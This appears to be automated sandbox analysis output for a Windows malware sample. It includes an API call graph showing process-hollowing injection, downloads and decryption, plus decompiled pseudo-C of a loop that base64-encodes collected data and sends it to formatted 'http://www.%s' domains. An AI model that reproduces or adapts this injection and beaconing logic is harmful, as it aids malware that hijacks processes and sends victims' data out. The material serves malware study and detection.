RegSetValueExA RegCloseKey 4753->4754 4754->4751 4756 400996b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 4755->4756 4756->4726 4758 4002080 4757->4758 4759 40020c3 GetEnvironmentVariableA lstrcatA 4757->4759 4758->4618 4758->4639 4760 40020f2 lstrcatA lstrcatA 4759->4760 4761 4002115 4759->4761 4760->4761 4762 4002138 VirtualAlloc 4761->4762 4762->4758 4763 400219d CreateProcessA 4762->4763 4764 40021e2 VirtualAllocEx 4763->4764 4765 40021ca VirtualFree 4763->4765 4766 4002213 VirtualAllocEx 4764->4766 4768 400227d 4764->4768 4765->4758 4767 400223c TerminateProcess CloseHandle CloseHandle VirtualFree 4766->4767 4766->4768 4767->4758 4769 400237b WriteProcessMemory 4768->4769 4770 40023a0 TerminateProcess CloseHandle CloseHandle VirtualFree 4769->4770 4771 40023e1 VirtualFree GetThreadContext 4769->4771 4770->4758 4772 4002444 WriteProcessMemory 4771->4772 4773 4002414 TerminateProcess CloseHandle CloseHandle 4771->4773 4774 4002497 SetThreadContext 4772->4774 4775 400246a TerminateProcess CloseHandle CloseHandle 4772->4775 4773->4758 4776 40024c4 ResumeThread 4774->4776 4777 40024d9 TerminateProcess CloseHandle CloseHandle 4774->4777 4775->4758 4776->4758 4777->4758 4779 40077c0 CoInitialize 4778->4779 4780 40078c3 4778->4780 4781 40077e8 4779->4781 4782 40078bd CoUninitialize 4779->4782 4783 4007898 VirtualFree 4781->4783 4784 40077fc GetExitCodeProcess 4781->4784 4782->4780 4787 40097c0 2 API calls 4783->4787 4785 400788f 4784->4785 4786 4007818 4784->4786 4785->4783 4788 4007821 Sleep 4786->4788 4789 400782e CloseHandle Sleep 4786->4789 4790 40078ba 4787->4790 4788->4785 4791 4002070 32 API calls 4789->4791 4790->4782 4792 4007851 4791->4792 4792->4785 4793 4007863 4792->4793 4794 4002510 8 API calls 4792->4794 4793->4783 4795 400788c 4794->4795 4795->4785 4959 100014a0 4960 100014e8 4959->4960 4961 100014d9 SetLastError 4959->4961 4962 10001505 SetLastError 4960->4962 4963 10001514 4960->4963 4973 1000169f 4961->4973 4962->4973 4964 10001562 4963->4964 4965 10001527 4963->4965 4967 1000156b SetLastError 4964->4967 4969 1000157f 4964->4969 4966 1000153a SetLastError 4965->4966 4971 10001549 4965->4971 4966->4973 4967->4973 4968 10001648 bsearch 4970 10001672 SetLastError 4968->4970 4968->4971 4969->4968 4978 100019f0 VirtualAlloc 4969->4978 4970->4973 4972 10001693 SetLastError 4971->4972 4971->4973 4972->4973 4975 100015b3 4976 100015c8 SetLastError 4975->4976 4977 100015d7 4975->4977 4976->4973 4977->4968 4978->4975 4979 4006da0 4980 4006db9 Sleep CoInitialize 4979->4980 4981 400723f 4979->4981 4982 4007017 GetEnvironmentVariableA 4980->4982 4983 4006e1b 4980->4983 4986 400703e 4982->4986 4984 4006ee5 4983->4984 4985 4006e3f VirtualAlloc 4983->4985 4987 4002070 32 API calls 4984->4987 4991 4006ee3 4985->4991 4994 4006e6e 4985->4994 4988 4009730 QueryPerformanceCounter 4986->4988 4987->4991 4989 400704f GetTickCount GetTempFileNameA CreateFileA 4988->4989 4992 4007239 CoUninitialize 4989->4992 4995 40070ac 4989->4995 4990 4006f21 4997 4006ff6 4990->4997 5022 40097a0 GetProcessHeap RtlAllocateHeap 4990->5022 4991->4990 4996 40073c0 5 API calls 4991->4996 5021 400700f 4991->5021 4992->4981 4993 4006ed2 VirtualFree 4993->4991 4994->4993 4998 4002070 32 API calls 4994->4998 4999 400718b WriteFile 4995->4999 5000 40070db VirtualAlloc 4995->5000 4996->4990 5005 4002510 8 API calls 4997->5005 4997->5021 5004 4006e97 4998->5004 5002 40071b5 CloseHandle 4999->5002 5001 4007189 5000->5001 5008 4007116 5000->5008 5001->5002 5002->4992 5009 40071cb 5002->5009 5004->4993 5007 4006ea8 VirtualAlloc 5004->5007 5005->5021 5006 4006f3a 5010 4006f6a VirtualAlloc 5006->5010 5015 4006f57 5006->5015 5011 4006ecf 5007->5011 5012 4007175 VirtualFree 5008->5012 5013 400713f WriteFile 5008->5013 5009->4992 5014 4001e60 2 API calls 5009->5014 5010->5015 5011->4993 5012->5001 5013->5012 5017 40071e5 5014->5017 5015->4997 5016 4006fbd CreateThread CloseHandle 5015->5016 5016->4997 5017->4992 5018 4007217 5017->5018 5019 40073c0 5 API calls 5017->5019 5018->4992 5020 4002510 8 API calls 5018->5020 5019->5018 5020->5021 5021->4992 5022->5006 5260 4002f60 5263 4003090 GetPEB 5260->5263 5262 4002f72 5263->5262 5264 4007865 5265 400788f VirtualFree 5264->5265 5267 40097c0 2 API calls 5265->5267 5268 40078ba CoUninitialize 5267->5268 5270 40078c3 5268->5270 5271 100021ea 5272 100021f3 IsBadHugeReadPtr 5271->5272 5273 100023bb 5272->5273 5274 10002207 5272->5274 5274->5273 5284 10001840 LoadLibraryA 5274->5284 5275 1000222d 5276 10002239 SetLastError 5275->5276 5277 1000224d 5275->5277 5276->5273 5278 10001a20 3 API calls 5277->5278 5279 10002267 5278->5279 5280 10002273 SetLastError 5279->5280 5282 1000229d 5279->5282 5280->5273 5282->5273 5283 100023ae SetLastError 5282->5283 5283->5273 5284->5275 5023 4004cad 5024 4004cb6 5023->5024 5027 4004cc3 5024->5027 5028 40052a2 5024->5028 5025 4008370 24 API calls 5026 4005344 5025->5026 5029 4005354 lstrlenA lstrlenA 5026->5029 5030 40056b8 VirtualFree VirtualFree VirtualFree 5026->5030 5032 4004db7 GetCurrentThreadId 5027->5032 5033 4004e2c 5027->5033 5069 4004ce5 5027->5069 5028->5025 5029->5030 5031 4005385 wsprintfA CryptBinaryToStringA 5029->5031 5034 40056eb CoUninitialize 5030->5034 5031->5030 5035 40053d0 MultiByteToWideChar 5031->5035 5032->5069 5037 4004ee1 5033->5037 5038 4004e81 GetSystemMetrics GetSystemMetrics 5033->5038 5033->5069 5039 40017d0 16 API calls 5035->5039 5041 4004f40 5037->5041 5042 4004ef0 GlobalMemoryStatus 5037->5042 5038->5069 5040 400543e 5039->5040 5043 400569b 5040->5043 5045 400547d VirtualFree 5040->5045 5046 400551b 5040->5046 5047 4005032 5041->5047 5048 4004fdf lstrlenA 5041->5048 5041->5069 5042->5069 5043->5030 5044 40056a4 VirtualFree 5043->5044 5044->5030 5049 40054b1 5045->5049 5046->5043 5050 400552c EnterCriticalSection 5046->5050 5051 4005041 lstrlenA 5047->5051 5052 4005096 5047->5052 5048->5069 5049->5046 5057 40017d0 16 API calls 5049->5057 5055 4005542 VirtualAlloc 5050->5055 5056 400558c VirtualAlloc 5050->5056 5051->5069 5053 4005104 5052->5053 5054 40050a5 lstrlenA 5052->5054 5059 4005172 5053->5059 5060 4005113 lstrlenA 5053->5060 5054->5069 5058 4005578 5055->5058 5061 40055c7 GetTickCount 5056->5061 5062 400568e LeaveCriticalSection 5056->5062 5057->5049 5058->5062 5063 40051e0 5059->5063 5064 4005181 lstrlenA 5059->5064 5060->5069 5068 40055da 5061->5068 5062->5043 5065 400523f 5063->5065 5066 40051ef lstrlenA 5063->5066 5064->5069 5067 4009b90 QueryPerformanceCounter 5065->5067 5065->5069 5066->5069 5067->5069 5070 400565c VirtualFree 5068->5070 5070->5062 5071 4008e30 CreateEventA CreateThread WaitForSingleObject 5072 10002430 5073 10002441 VirtualProtect 5072->5073 5076 1000243c 5072->5076 5074 10002472 5073->5074 5075 100024a4 VirtualProtect 5074->5075 5074->5076 5075->5076 5077 4001f30 5078 4001f50 VirtualAlloc 5077->5078 5079 400203f 5077->5079 5080 4001f97 VirtualAlloc 5078->5080 5081 4001fad 5078->5081 5080->5081 5081->5079 5082 4002ed0 GetPEB 5081->5082 5082->5079 5083 4005db0 5084 4007d20 5083->5084 5085 4005dcc lstrcpyA 5084->5085 5086 4001e60 2 API calls 5085->5086 5087 4005ded 5086->5087 5329 4004bf0 5330 4004bf9 5329->5330 5331 40056f0 CoUninitialize 5330->5331 5332 4004c10 WaitForSingleObject 5330->5332 5333 4004c28 VirtualAlloc VirtualAlloc VirtualAlloc 5330->5333 5332->5333 5334 4004c23 5332->5334 5333->5334 5335 4004c8a 5333->5335 5334->5331 5335->5334 5338 4004cc3 5335->5338 5339 40052a2 5335->5339 5336 4008370 24 API calls 5337 4005344 5336->5337 5340 4005354 lstrlenA lstrlenA 5337->5340 5341 40056b8 VirtualFree VirtualFree VirtualFree 5337->5341 5343 4004db7 GetCurrentThreadId 5338->5343 5344 4004e2c 5338->5344 5349 4004ce5 5338->5349 5339->5336 5340->5341 5342 4005385 wsprintfA CryptBinaryToStringA 5340->5342 5341->5334 5342->5341 5345 40053d0 MultiByteToWideChar 5342->5345 5343->5349 5346 4004ee1 5344->5346 5347 4004e81 GetSystemMetrics GetSystemMetrics 5344->5347 5344->5349 5348 40017d0 16 API calls 5345->5348 5351 4004f40 5346->5351 5352 4004ef0 GlobalMemoryStatus 5346->5352 5347->5349 5350 400543e 5348->5350 5353 400569b 5350->5353 5355 400547d VirtualFree 5350->5355 5374 400551b 5350->5374 5351->5349 5356 4005032 5351->5356 5357 4004fdf lstrlenA 5351->5357 5352->5349 5353->5341 5354 40056a4 VirtualFree 5353->5354 5354->5341 5378 40054b1 5355->5378 5359 4005041 lstrlenA 5356->5359 5360 4005096 5356->5360 5357->5349 5358 400552c EnterCriticalSection 5363 4005542 VirtualAlloc 5358->5363 5364 400558c VirtualAlloc 5358->5364 5359->5349 5361 4005104 5360->5361 5362 40050a5 lstrlenA 5360->5362 5366 4005172 5361->5366 5367 4005113 lstrlenA 5361->5367 5362->5349 5372 4005578 5363->5372 5368 40055c7 GetTickCount 5364->5368 5369 400568e LeaveCriticalSection 5364->5369 5365 40017d0 16 API calls 5365->5378 5370 40051e0 5366->5370 5371 4005181 lstrlenA 5366->5371 5367->5349 5373 40055da 5368->5373 5369->5353 5375 400523f 5370->5375 5376 40051ef lstrlenA 5370->5376 5371->5349 5372->5369 5379 400565c VirtualFree 5373->5379 5374->5353 5374->5358 5375->5349 5377 4009b90 QueryPerformanceCounter 5375->5377 5376->5349 5377->5349 5378->5365 5378->5374 5379->5369 5285 40038f0 5287 4003909 5285->5287 5286 40035e0 16 API calls 5286->5287 5287->5286 5288 40039fa VirtualQuery 5287->5288 5289 4003a50 5287->5289 5290 4003a1d VirtualProtect 5287->5290 5288->5287 5290->5287 5291 4008cf0 5292 4008d07 5291->5292 5293 4008e1a 5291->5293 5292->5293 5294 4008d25 CryptAcquireContextA 5292->5294 5295 4008d49 GetLastError 5294->5295 5296 4008d7e 5294->5296 5297 4008d64 CryptAcquireContextA 5295->5297 5298 4008d5b 5295->5298 5296->5293 5299 4008d88 CryptCreateHash 5296->5299 5297->5296 5298->5296 5298->5297 5300 4008da3 CryptHashData 5299->5300 5301 4008e0e CryptReleaseContext 5299->5301 5302 4008e04 CryptDestroyHash 5300->5302 5303 4008dbb CryptDeriveKey 5300->5303 5301->5293 5302->5301 5303->5302 5304 4008ddf CryptDecrypt CryptDestroyKey 5303->5304 5304->5302 5305 10001870 GetProcAddress 5306 4002af0 5307 4002df2 5306->5307 5308 4002b0f 5306->5308 5308->5307 5309 4002b99 InternetOpenUrlA 5308->5309 5310 4002b4e InternetQueryOptionA InternetSetOptionA 5308->5310 5311 4002bc3 5309->5311 5312 4002dda GetLastError 5309->5312 5310->5309 5313 4002be0 HttpQueryInfoA 5311->5313 5312->5307 5314 4002c16 5313->5314 5315 4002dce InternetCloseHandle 5313->5315 5314->5315 5316 4002c3b VirtualAlloc 5314->5316 5315->5307 5316->5315 5317 4002c61 5316->5317 5318 4002c81 InternetReadFile 5317->5318 5319 4002ca6 5317->5319 5318->5317 5318->5319 5320 4002d10 HttpQueryInfoA 5319->5320 5321 4002d55 5320->5321 5322 4002d3f lstrcmpiA 5320->5322 5323 4002dba VirtualFree 5321->5323 5322->5321 5323->5315 5324 100024f0 LoadLibraryExA 5325 1000251c GetProcAddress 5324->5325 5327 10002518 5324->5327 5328 10002537 VirtualProtect VirtualProtect 5325->5328 5328->5327 5088 4003936 5090 400393f 5088->5090 5091 40039fa VirtualQuery 5090->5091 5092 4003a50 5090->5092 5093 4003a1d VirtualProtect 5090->5093 5094 40035e0 GetModuleHandleA 5090->5094 5091->5090 5093->5090 5095 4003607 5094->5095 5096 40038da 5094->5096 5097 400361a GetModuleFileNameA 5095->5097 5096->5090 5097->5096 5098 400363b CreateFileA 5097->5098 5098->5096 5099 400366a GetFileSize 5098->5099 5100 400368c VirtualAlloc 5099->5100 5101 40038cd CloseHandle 5099->5101 5100->5101 5102 40036b5 ReadFile 5100->5102 5101->5096 5113 4003370 5102->5113 5107 4003872 VirtualFree VirtualFree 5107->5101 5109 400384d 5109->5107 5110 40035e0 3 API calls 5109->5110 5110->5107 5111 4003738 5111->5107 5111->5109 5112 40037f4 lstrcpynA lstrcatA lstrcpyA 5111->5112 5112->5109 5115 400337f 5113->5115 5114 4003397 5119 4003580 5114->5119 5115->5114 5116 400339e VirtualAlloc 5115->5116 5116->5114 5118 40033ca 5116->5118 5117 4003494 VirtualFree 5117->5114 5118->5114 5118->5117 5120 4003592 lstrlenA 5119->5120 5121 4003596 5119->5121 5120->5107 5120->5111 5121->5120 5123 40034b0 5121->5123 5124 40034bc 5123->5124 5126 40034c3 5123->5126 5124->5120 5125 4003518 lstrcmpA 5125->5124 5125->5126 5126->5124 5126->5125 5380 1000157a 5381 10001688 5380->5381 5382 10001693 SetLastError 5381->5382 5383 1000169f 5381->5383 5382->5383 5384 4003fff WSACleanup CoUninitialize 5385 400400a ExitProcess 5384->5385

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 4004ba0-4004bbc CoInitialize 1 40056f0-40056fc CoUninitialize 0->1 2 4004bc2-4004bff call 4007b70 SetEvent 0->2 2->1 6 4004c05-4004c0e 2->6 7 4004c10-4004c21 WaitForSingleObject 6->7 8 4004c28-4004c84 VirtualAlloc * 3 6->8 7->8 9 4004c23 7->9 10 4004c8a-4004c8e 8->10 11 40056eb 8->11 9->1 10->11 12 4004c94-4004c98 10->12 11->1 12->11 13 4004c9e-4004cbd 12->13 15 40052a2-40052b2 13->15 16 4004cc3-4004cd0 13->16 19 40052b4-40052be 15->19 20 4005325-400534e call 4008370 15->20 17 4004cd6-4004ce3 16->17 18 400529d 16->18 22 4004ce5-4004d17 call 4006170 * 2 call 40060c0 17->22 23 4004d1c-4004d29 17->23 19->20 21 40052c0-40052d1 19->21 34 4005354-400537f lstrlenA * 2 20->34 35 40056b8-40056e5 VirtualFree * 3 20->35 21->20 25 40052d3-40052dd 21->25 22->18 28 4004d62-4004d6f 23->28 29 4004d2b-4004d5d call 4006170 * 2 call 40060c0 23->29 25->20 30 40052df-4005322 call 4007b70 25->30 32 4004d71-4004da3 call 4006170 * 2 call 40060c0 28->32 33 4004da8-4004db5 28->33 29->18 30->20 32->18 41 4004db7-4004dd8 GetCurrentThreadId call 4006170 33->41 42 4004e2c-4004e39 33->42 34->35 40 4005385-40053ca wsprintfA CryptBinaryToStringA 34->40 35->11 40->35 48 40053d0-400544e MultiByteToWideChar call 40017d0 40->48 60 4004dda-4004dfb call 4006170 call 40060c0 41->60 61 4004dfd-4004e04 41->61 49 4004e72-4004e7f 42->49 50 4004e3b-4004e6d call 4006170 * 2 call 40060c0 42->50 79 4005454-400545e 48->79 80 400569b-40056a2 48->80 53 4004ee1-4004eee 49->53 54 4004e81-4004eb4 GetSystemMetrics * 2 call 4006170 49->54 50->18 67 4004f40-4004f4d 53->67 68 4004ef0-4004f13 GlobalMemoryStatus call 4006170 53->68 77 4004eb9-4004edc call 4006170 call 40060c0 54->77 76 4004e27 60->76 75 4004e06-4004e24 call 4006170 call 40060c0 61->75 61->76 73 4004f86-4004f93 67->73 74 4004f4f-4004f81 call 4006170 * 2 call 40060c0 67->74 93 4004f18-4004f3b call 4006170 call 40060c0 68->93 88 4004fd0-4004fdd 73->88 89 4004f95-4004fcb call 4006170 * 2 call 40060c0 73->89 74->18 75->76 76->18 77->18 91 4005470-4005477 79->91 92 4005460-400546a 79->92 80->35 90 40056a4-40056b2 VirtualFree 80->90 99 4005032-400503f 88->99 100 4004fdf-400502d lstrlenA call 4006170 * 2 call 40060c0 88->100 89->18 90->35 94 400547d-40054af VirtualFree 91->94 95 400551f-4005526 91->95 92->91 92->95 93->18 105 40054c0-40054c7 94->105 95->80 112 400552c-4005540 EnterCriticalSection 95->112 114 4005041-4005091 lstrlenA call 4006170 * 2 call 40060c0 99->114 115 4005096-40050a3 99->115 100->18 105->95 119 40054c9-40054f5 call 40017d0 105->119 125 4005542-4005573 VirtualAlloc call 4007b70 112->125 126 400558c-40055c1 VirtualAlloc 112->126 114->18 120 4005104-4005111 115->120 121 40050a5-40050ff lstrlenA call 4006170 * 2 call 40060c0 115->121 145 40054fa-400550d 119->145 136 4005172-400517f 120->136 137 4005113-400516d lstrlenA call 4006170 * 2 call 40060c0 120->137 121->18 151 4005578-4005587 125->151 138 40055c7-40055d8 GetTickCount 126->138 139 400568e-4005695 LeaveCriticalSection 126->139 146 40051e0-40051ed 136->146 147 4005181-40051db lstrlenA call 4006170 * 2 call 40060c0 136->147 137->18 141 40055da-400561a call 4007b70 * 2 138->141 142 400561c-4005659 call 4007b70 * 2 138->142 139->80 193 400565c-400568b VirtualFree 141->193 142->193 157 400551b 145->157 158 400550f-4005519 145->158 162 400523f-400524c 146->162 163 40051ef-400523d lstrlenA call 4006170 * 2 call 40060c0 146->163 147->18 151->139 157->95 158->157 170 400551d 158->170 162->18 168 400524e-400529a call 4009b90 call 4006170 * 2 call 40060c0 162->168 163->18 168->18 170->105 193->139
                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                          			E04004BA0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                                                                          				char* _v60;
                                                                                                                                                                                                                                                                          				CHAR* _v64;
                                                                                                                                                                                                                                                                          				intOrPtr* _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				int _v76;
                                                                                                                                                                                                                                                                          				void* _v80;
                                                                                                                                                                                                                                                                          				void* _v84;
                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                          				void* _v92;
                                                                                                                                                                                                                                                                          				void* _v96;
                                                                                                                                                                                                                                                                          				void* _v100;
                                                                                                                                                                                                                                                                          				void* _v124;
                                                                                                                                                                                                                                                                          				void* _v132;
                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                          				void* _v140;
                                                                                                                                                                                                                                                                          				void* _v144;
                                                                                                                                                                                                                                                                          				void* _v148;
                                                                                                                                                                                                                                                                          				void* _v152;
                                                                                                                                                                                                                                                                          				void* _v156;
                                                                                                                                                                                                                                                                          				void* _v160;
                                                                                                                                                                                                                                                                          				char _v420;
                                                                                                                                                                                                                                                                          				CHAR* _v424;
                                                                                                                                                                                                                                                                          				int _v428;
                                                                                                                                                                                                                                                                          				void* _v432;
                                                                                                                                                                                                                                                                          				long _v436;
                                                                                                                                                                                                                                                                          				short _v948;
                                                                                                                                                                                                                                                                          				void* _v952;
                                                                                                                                                                                                                                                                          				void* _v956;
                                                                                                                                                                                                                                                                          				void* _v960;
                                                                                                                                                                                                                                                                          				void* _v964;
                                                                                                                                                                                                                                                                          				long _v968;
                                                                                                                                                                                                                                                                          				void* _t306;
                                                                                                                                                                                                                                                                          				void* _t307;
                                                                                                                                                                                                                                                                          				void* _t308;
                                                                                                                                                                                                                                                                          				int _t312;
                                                                                                                                                                                                                                                                          				int _t318;
                                                                                                                                                                                                                                                                          				long _t328;
                                                                                                                                                                                                                                                                          				void* _t333;
                                                                                                                                                                                                                                                                          				void* _t351;
                                                                                                                                                                                                                                                                          				long _t358;
                                                                                                                                                                                                                                                                          				void* _t637;
                                                                                                                                                                                                                                                                          				void* _t638;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                                                                          					L83:
                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					E04007B70( &_v36, _v8, 0x1c);
                                                                                                                                                                                                                                                                          					_t638 = _t637 + 0xc;
                                                                                                                                                                                                                                                                          					SetEvent( *(_v8 + 0x10));
                                                                                                                                                                                                                                                                          					_v40 = 0xea60;
                                                                                                                                                                                                                                                                          					_v44 = _v28;
                                                                                                                                                                                                                                                                          					while(_v44 <= _v24 && (( *(_v12 + 0x28) & 0x000000ff) != 0 || WaitForSingleObject( *(_v12 + 0x24), 0xa) != 0)) {
                                                                                                                                                                                                                                                                          						_v64 = _v44 * 0x28 + _v36;
                                                                                                                                                                                                                                                                          						_v52 = 0x100000;
                                                                                                                                                                                                                                                                          						_t306 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v48 = _t306;
                                                                                                                                                                                                                                                                          						_t307 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v56 = _t307;
                                                                                                                                                                                                                                                                          						_t308 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v60 = _t308;
                                                                                                                                                                                                                                                                          						if(_v48 == 0 || _v56 == 0 || _v60 == 0) {
                                                                                                                                                                                                                                                                          							L82:
                                                                                                                                                                                                                                                                          							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v68 = _v48;
                                                                                                                                                                                                                                                                          							_v80 = 0;
                                                                                                                                                                                                                                                                          							while(_v80 < 0x100) {
                                                                                                                                                                                                                                                                          								_v80 = _v80 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                          							if( *0x40118a4 == 2 &&  *((intOrPtr*)(_v16 + 0x453)) > 0 &&  *((intOrPtr*)(_v16 + 0x453)) < 0x100000 - _v72 &&  *((intOrPtr*)(_v16 + 0x457)) != 0) {
                                                                                                                                                                                                                                                                          								 *_v68 =  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                          								_v68 = _v68 + 4;
                                                                                                                                                                                                                                                                          								E04007B70(_v68,  *((intOrPtr*)(_v16 + 0x457)),  *((intOrPtr*)(_v16 + 0x453)));
                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                          								_v68 = _v68 +  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                          							_t312 = E04008370(_v48, _v72, _v56, 0x100000); // executed
                                                                                                                                                                                                                                                                          							_t638 = _t638 + 0x10;
                                                                                                                                                                                                                                                                          							_v76 = _t312;
                                                                                                                                                                                                                                                                          							if(_v76 <= 0) {
                                                                                                                                                                                                                                                                          								L81:
                                                                                                                                                                                                                                                                          								VirtualFree(_v48, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								VirtualFree(_v56, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								VirtualFree(_v60, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								goto L82;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v424 = "http://www.%s";
                                                                                                                                                                                                                                                                          								_t318 = lstrlenA(_v64);
                                                                                                                                                                                                                                                                          								if(_t318 + lstrlenA(_v424) >= 0x100) {
                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								wsprintfA( &_v420, _v424, _v64);
                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                          								_v428 = 0x100000;
                                                                                                                                                                                                                                                                          								if(CryptBinaryToStringA(_v56, _v76, 0x40000001, _v60,  &_v428) == 0) {
                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v956 = 0;
                                                                                                                                                                                                                                                                          								_v432 = 0;
                                                                                                                                                                                                                                                                          								MultiByteToWideChar(1, 1,  &_v420, 0xffffffff,  &_v948, 0x100);
                                                                                                                                                                                                                                                                          								_v952 = 0;
                                                                                                                                                                                                                                                                          								_t328 = E040017D0( &_v420,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                          								_v436 = _t328;
                                                                                                                                                                                                                                                                          								if(_v436 <= 0) {
                                                                                                                                                                                                                                                                          									L79:
                                                                                                                                                                                                                                                                          									if(_v956 != 0) {
                                                                                                                                                                                                                                                                          										VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v436 < 0x100 || _v952 >= 0x1f4) {
                                                                                                                                                                                                                                                                          									if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                          										goto L70;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          									_v956 = 0;
                                                                                                                                                                                                                                                                          									_v432 = 0;
                                                                                                                                                                                                                                                                          									_v960 = 0;
                                                                                                                                                                                                                                                                          									while(_v960 < 4) {
                                                                                                                                                                                                                                                                          										_t358 = E040017D0(_v428,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                          										_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                          										_v436 = _t358;
                                                                                                                                                                                                                                                                          										if(_v436 > 0x100 || _v952 < 0x1f4) {
                                                                                                                                                                                                                                                                          											goto L70;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											_v960 = _v960 + 1;
                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L70;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									L70:
                                                                                                                                                                                                                                                                          									if(_v436 > 0) {
                                                                                                                                                                                                                                                                          										EnterCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                          										if( *(_v12 + 4) != 0) {
                                                                                                                                                                                                                                                                          											_v968 =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                          											_t333 = VirtualAlloc(0, _v968, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          											_v964 = _t333;
                                                                                                                                                                                                                                                                          											if(_v964 != 0) {
                                                                                                                                                                                                                                                                          												if(GetTickCount() % 2 != 0) {
                                                                                                                                                                                                                                                                          													E04007B70(_v964, _v956, _v436);
                                                                                                                                                                                                                                                                          													E04007B70(_v964 + _v436,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                          													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													E04007B70(_v964,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                          													E04007B70(_v964 +  *(_v12 + 8), _v956, _v436);
                                                                                                                                                                                                                                                                          													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												 *(_v12 + 8) =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                          												VirtualFree( *(_v12 + 4), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          												 *(_v12 + 4) = _v964;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											_t351 = VirtualAlloc(0, _v436, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          											 *(_v12 + 4) = _t351;
                                                                                                                                                                                                                                                                          											E04007B70( *(_v12 + 4), _v956, _v436);
                                                                                                                                                                                                                                                                          											_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                          											 *(_v12 + 8) = _v436;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										LeaveCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L79;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L83;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
























































                                                                                                                                                                                                                                                                          0x04004bac
                                                                                                                                                                                                                                                                          0x04004bb5
